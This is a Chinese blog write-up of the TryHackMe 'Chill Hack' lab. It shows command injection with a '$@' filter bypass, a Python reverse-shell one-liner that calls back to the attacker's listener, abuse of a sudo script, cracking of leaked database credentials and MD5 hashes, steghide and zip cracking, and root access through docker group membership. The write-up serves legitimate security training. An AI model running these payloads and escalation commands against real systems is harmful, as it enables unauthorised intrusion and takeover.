【Tryhackme】Chill Hack(命令行注入,用户组提权:docker)

最新推荐文章于 2024-03-22 00:18:36 发布
最新推荐文章于 2024-03-22 00:18:36 发布
阅读量147 收藏
点赞数
文章标签: docker linux 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/text2204/article/details/128381447
版权

免责声明

本文渗透的主机经过合法授权。本文使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和渗透思路用于任何非法用途,对此产生的一切后果,本人不承担任何责任,也不对造成的任何误用或损害负责。

服务发现

┌──(root💀kali)-[~/tryhackme/chillhack]
└─# nmap -sV -Pn 10.10.49.122
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-27 09:47 EDT
Nmap scan report for 10.10.49.122
Host is up (0.33s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp openftp vsftpd 3.0.3
22/tcp openssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp openhttpApache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.23 seconds

开启的服务有ftp,ssh,http

匿名登录ftp

有一个note.txt文件,下载到本地分析

└─# ftp 10.10.49.122
Connected to 10.10.49.122.
220 (vsFTPd 3.0.3)
Name (10.10.49.122:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x2 01154096 Oct 032020 .
drwxr-xr-x2 01154096 Oct 032020 ..
-rw-r--r--1 1001 1001 90 Oct 032020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
226 Transfer complete.
90 bytes received in 0.00 secs (37.4800 kB/s)
ftp> bye
221 Goodbye.

查看该文件

┌──(root💀kali)-[~/tryhackme/chillhack]
└─# cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar

暴露两个可能的用户名:AnurodhApaar

命令行加了一些过滤?

查看80端口服务

爆破目录

└─# python3 dirsearch.py -u "http://10.10.49.122" -e* -t 100 2 ⨯_|. _ ____ _|_v0.4.2
 (_||| _) (/_(_|| (_| ) 
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bakHTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/tryhackme/dirsearch/reports/10.10.49.122/_21-10-27_09-49-03.txt

Error Log: /root/tryhackme/dirsearch/logs/errors-21-10-27_09-49-03.log

Target: http://10.10.49.122/

[09:49:04] Starting:[09:49:30] 200 - 21KB - /about.html 
[09:49:51] 400 -304B- /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 
[09:49:54] 200 -0B- /contact.php[09:49:54] 200 - 18KB - /contact.html 
[09:49:55] 301 -310B- /css->http://10.10.49.122/css/[09:50:02] 301 -312B- /fonts->http://10.10.49.122/fonts/[09:50:07] 301 -313B- /images->http://10.10.49.122/images/[09:50:07] 200 - 16KB - /images/[09:50:09] 200 - 34KB - /index.html 
[09:50:10] 200 -3KB - /js/[09:50:22] 200 - 19KB - /news.html[09:50:35] 301 -313B- /secret->http://10.10.49.122/secret/[09:50:35] 403 -277B- /server-status[09:50:36] 403 -277B- /server-status/ 
[09:50:36] 200 -168B- /secret/Task Completed

我们看到有一个叫/secret/的目录,一般能叫这种名字的多数都是攻击点

打开发现是一个命令行执行程序

经过测试,命令行做了一些过滤,很多命令都不能正常执行,但是我们可以用$@绕过

比如查看/etc/passwd

c$@at /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
aurick:x:1000:1000:Anurodh:/home/aurick:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
apaar:x:1001:1001:,,,:/home/apaar:/bin/bash
anurodh:x:1002:1002:,,,:/home/anurodh:/bin/bash
ftp:x:112:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin

我们创建一个反弹shell,使用paylpad: python3$@ -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.13.21.169",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

拿到初始shell

┌──(root💀kali)-[~/tryhackme/chillhack]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.49.122] 58604
$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
whoami
www-data

切换成tty,查看本账户权限,可以用apaar的身份运行一个脚本

www-data@ubuntu:/var/www/html/secret$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh

查看这个脚本的内容和权限

cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
www-data@ubuntu:/var/www/html/secret$ ls -alh /home/apaar/.helpline.sh
ls -alh /home/apaar/.helpline.sh
-rwxrwxr-x 1 apaar apaar 286 Oct42020 /home/apaar/.helpline.sh

此文件对于本账户不可写,因此不可以直接把shell写进bash 但是留意代码内容,它分别接受两个参数,第一个person没有什么作用,第二个msg,我们可以看见是作为一个命令直接执行了,因此我们可以加以利用

横向提权到apaar

我们把msg命令赋值为:/bin/bash,拿到apaar的shell

www-data@ubuntu:/var/www/html/secret$ sudo -u apaar/home/apaar/.helpline.sh 
<ml/secret$ sudo -u apaar/home/apaar/.helpline.sh 

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: max
max
Hello user! I am max,Please enter your message: /bin/bash
/bin/bash
id
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
whoami
whoami
apaar

在apaar的home目录拿到user flag

横向提权到Anurodh

我们在/var/www/files/index.php找到数据库登录信息

apaar@ubuntu:/var/www/files$ cat index.php
cat index.php
<html>
<body>
<?phpif(isset($_POST['submit'])){$username = $_POST['username'];$password = $_POST['password'];ob_start();session_start();try{$con = new PDO("mysql:dbname=webportal;host=localhost","root","!@m+her00+@db");$con->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_WARNING);}catch(PDOException $e){exit("Connection failed ". $e->getMessage());}require_once("account.php");$account = new Account($con);$success = $account->login($username,$password);if($success){header("Location: hacker.php");}}
?>

登录数据库,在user表找到两个用户密码

mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql|
| performance_schema |
| sys|
| webportal|
+--------------------+
5 rows in set (0.00 sec)

mysql> use webportal
use webportal
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+---------------------+
| Tables_in_webportal |
+---------------------+
| users |
+---------------------+
1 row in set (0.00 sec)

mysql> select * from users;
select * from users;
+----+-----------+----------+-----------+----------------------------------+
| id | firstname | lastname | username| password |
+----+-----------+----------+-----------+----------------------------------+
|1 | Anurodh | Acharya| Aurick| 7e53614ced3640d5de23f111806cc4fd |
|2 | Apaar | Dahal| cullapaar | 686216240e5af30df0501e53c789a649 |

两个md5解密出来分别是:

Anurodh :masterpassword Apaar :dontaskdonttell

然而这两个并不是ssh密码。。。

我们把images里面的两个文件下载到本地,用steghide分离出一个隐藏文件

└─# steghide extract -sf hacker-with-laptop_23-2147985341.jpg127 ⨯
Enter passphrase: 
wrote extracted data to "backup.zip".

用zip2john把文件转成john可以读取的信息,然后再用john破解这个zip文件

┌──(root💀kali)-[~/tryhackme/chillhack]
└─# zip2john backup.zip >passwd.hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3

┌──(root💀kali)-[~/tryhackme/chillhack]
└─# john passwd.hash passwd.hash --wordlist=/usr/share/wordlists/rockyou.txt 1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word(backup.zip/source_code.php)
1g 0:00:00:00 DONE (2021-10-27 13:06) 100.0g/s 1638Kp/s 1638Kc/s 1638KC/s total90..cocoliso
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably
Session completed

解压加密zip得到一个php文件

<?phpif(isset($_POST['submit']))
	{
		$email = $_POST["email"];
		$password = $_POST["password"];
		if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
		{ 
			$random = rand(1000,9999);?><br><br><br>
			<form method="POST">
				Enter the OTP: <input type="number" name="otp">
				<input type="submit" name="submitOtp" value="Submit">
			</form>
		<?php	mail($email,"OTP for authentication",$random);
			if(isset($_POST["submitOtp"]))
				{
					$otp = $_POST["otp"];
					if($otp == $random)
					{
						echo "Welcome Anurodh!";
						header("Location: authenticated.php");
					}
					else
					{
						echo "Invalid OTP";
					}
				}
 		}
		else
		{
			echo "Invalid Username or Password";
		}}
?>

从代码可知,这是验证anurodh的登录文件,密码被base64加密

这个凭证可以登录anurodh的ssh

登录进去以后传linpeas,发现当前用户在docker用户组,可以利用组权限提权

anurodh@ubuntu:/tmp$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)

提权到root

anurodh@ubuntu:/tmp$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root
# ls
proof.txt
万天峰
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux 添加www用户,Linux把用户添加到组(www-data|sudo)
weixin_39614276的博客
04-29 2601
Post Views:149设置网站的根目录的用户和组为:www-datasudo chown -R www-data:www-data /var/www/html/sun@karat:/var/www$ ls -ltotal 4drwxr-xr-x 2 root root 4096 Jul 3 17:31 htmlsun@karat:/var/www$ sudo chown -R www-da...
TryhackmeChill+Hack(命令行注入用户组提权docker)
hyun134340的博客
01-05 297
此文件对于本账户不可写,因此不可以直接把shell写进bash 但是留意代码内容,它分别接受两个参数,第一个person没有什么作用,第二个msg,我们可以看见是作为一个命令直接执行了,因此我们可以加以利用。经过测试,命令行做了一些过滤,很多命令都不能正常执行,但是我们可以用$@绕过。我们看到有一个叫/secret/的目录,一般能叫这种名字的多数都是攻击点。
vulnhub----CHILL HACK
weixin_50339832的博客
06-09 232
扫描靶机 nmap -A -p- 192.168.241.0/24 masscan -p80 192.168.241.0/24
关于Linux环境下的LXD及Docker提权
最新发布
qq_46081990的博客
03-22 1621
Docker是一个开源的容器化平台,它建立在LXC之上,并提供了一套更高级别的工具和API,使得容器的构建、分发和运行变得更加简单。LXD主要面向系统级容器,可以运行完整的操作系统镜像,并提供类似于虚拟机的环境。上述提权方案只是对宿主机目录有了操作权限,如果此时反弹 shell 得到的权限将是容器内的 root 权限,而非宿主机的 root 权限,显然不是我们想要的。拉取镜像,创建容器,将宿主机的根目录 "/" 挂载到容器中的 "/mnt" 目录,进入 /mnt/root 目录查看便可得到 flag`
linux定时任务打包提权&docker提权
m0_62207170的博客
03-03 689
linux定时任务打包提权&docker提权
20210424web渗透学习之命令注入提权的常见方法%ctf题目(通配符在野、tar、chown、rsync、ln)
qq_45290991的博客
04-24 1232
命令执行到提权 </h1> <div class="clear"></div> <div class="postBody"> <div id="cnblogs_post_body" class="blogpost-body blogpost-body-html"> Zedd / 2019-03-1...
chill:Kryo 序列化库的 Scala 扩展
08-04
寒意 扩展,包括序列化程序和一组类,... Chill 有一组子项目:chill-java、chill-hadoop、chill-storm 和 chill-scala。 除了 chill-scala,所有这些项目都是用 Java 编写的,因此它们很容易在任何 JVM 平台上使用。冷
chill-the-lion:#ThreeJS#演示
05-24
总的来说,“chill-the-lion”项目展示了ThreeJS在3D交互式内容创作上的强大能力,包括物体创建、动画控制、用户交互和物理模拟等多个方面。通过深入理解这些技术,开发者可以创建出更加生动、真实的3D web应用。
chill_2.12-0.9.3-API文档-中文版.zip
07-06
赠送jar包:chill_2.12-0.9.3.jar; 赠送原API文档:chill_2.12-0.9.3-javadoc.jar; 赠送源代码:chill_2.12-0.9.3-sources.jar; 赠送Maven依赖信息文件:chill_2.12-0.9.3.pom; 包含翻译后的API文档:chill_2.12...
pip-chill:更轻松的“点冻结”
05-01
PIP Chill-仅使用您需要的软件包进行要求 类似于pip Frozen,但仅列出不依赖于已安装软件包的软件包。 免费软件:GNU通用公共许可证v3 文档: : 。 特征 生成需求文件,而不包含依赖于文件中其他软件包的任何...
Chill:CouchDb 客户端库
06-25
$ chill = new Chill \ Client ( 'localhost' , 'my_database' ); $ doc = $ chill -> get ( '8128173972d50affdb6724ecbd00d9fc' ); print $ doc [ '_id' ]; 将视图的结果检索为 Chill Document 对象: $ chill...
CHill_HACK靶机渗透测试
weixin_49340699的博客
07-23 535
CHill_HACK靶机渗透测试环境工具流程 环境 kali IP 192.168.19.131 靶机 IP 192.168.19.154 工具 netdicover nmap gobuster netcat steghide frackzip base64在线解码 流程 首先使用netdiscover对目标网段进行扫描主机发现 发现目标主机192.168.19.154 nmap对端口扫描信息收集 目标靶机开启了ssh,ftp,http 先从21端口开始收集查看ftp是否存在匿名登录,存在匿名登录,登录
vulnhub靶机-CHILL HACK: 1
臭nana的博客
12-21 1005
靶机描述:提示枚举 1、找到靶机ip:192.168.74.135 nmap -sn 192.168.74.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.74.135 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.135 Host is up (0.0044s latency). Not shown: 65532 closed ports PO
限制OpenMP线程数提速
热门推荐
silence2015的专栏
06-11 1万+
背景:视频帧序列逐个跑一遍CNN模型,发现CPU被占满了 经过debug发现问题出在torchvision transorms.totensor上 经过搜索,torch在设计多线程加速计算时候会默认占满所有core,因此cpu会飙满,这对别的应用程序速度影响非常大,因此需要控制一下。 解决方法: 1)torch.set_num_threads(1) 手动控制一下torch占用的线程数 2)设置环境变量 export OMP_NUM_THREADS=1 or export MKL_NUM_THREADS=1
破解框星期天写作窝metasploit
weixin_26636643的博客
09-22 294
This is the 22nd blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP like machines compiled by TJ_Null can be found here. 这是我将...
control threads num in openmp
qq_38963393的博客
05-18 131
calling omp_set_num_threads() doesn't guarantee that the OpenMP runtime will use exactly the specified number of threads. omp_set_num_threads() is used to override the value of the environment variable OMP_NUM_THREADS and they both control the upper limi
docker用户组提权
Vicl1fe的博客
12-23 2344
关于docker提权 如果一个服务器有一个普通的用户,并且这个用户加入了docker组,则这个用户已经是root了。下面看具体操作 我创了一个用户,并且加入了docker组。 docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因,Docker 给予所有 docker 组的用户相当大的权力(虽然权力只体现在能访问 /var/run/docker.sock ...
linux~Docker容器提权
@小张小张的博客
11-06 4731
Docker容器的特点: 1.轻量级 在机器上运行的Docker容器共享该机器的操作系统内核; 他们使用更少的计算和内存。图像由文件系统层构建并共享公用文件。最大限度地减少了磁盘使用量。 2.标准 Docker容器基于开放标准,可在Linux发行版,Microsoft Windows以及任何基础架构(包括虚拟机,裸机)上运行。 3.安全 Docker容器将应用程序彼此隔离并从底层基础架构中分离出来。提供了最强大的默认隔离功能,可以将应用程序问题限制在一个容器中,而不是整个机器上。 关于docker提权
com.twitter:chill对应的pom.xml的依赖
06-01
<artifactId>chill_2.12 <version>0.9.5 ``` 注意,这是针对Scala 2.12版本的依赖信息。如果你使用的是其他版本的Scala,需要将artifactId中的"_2.12"替换成对应的版本号后缀。比如,如果你使用的是Scala 2.11,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值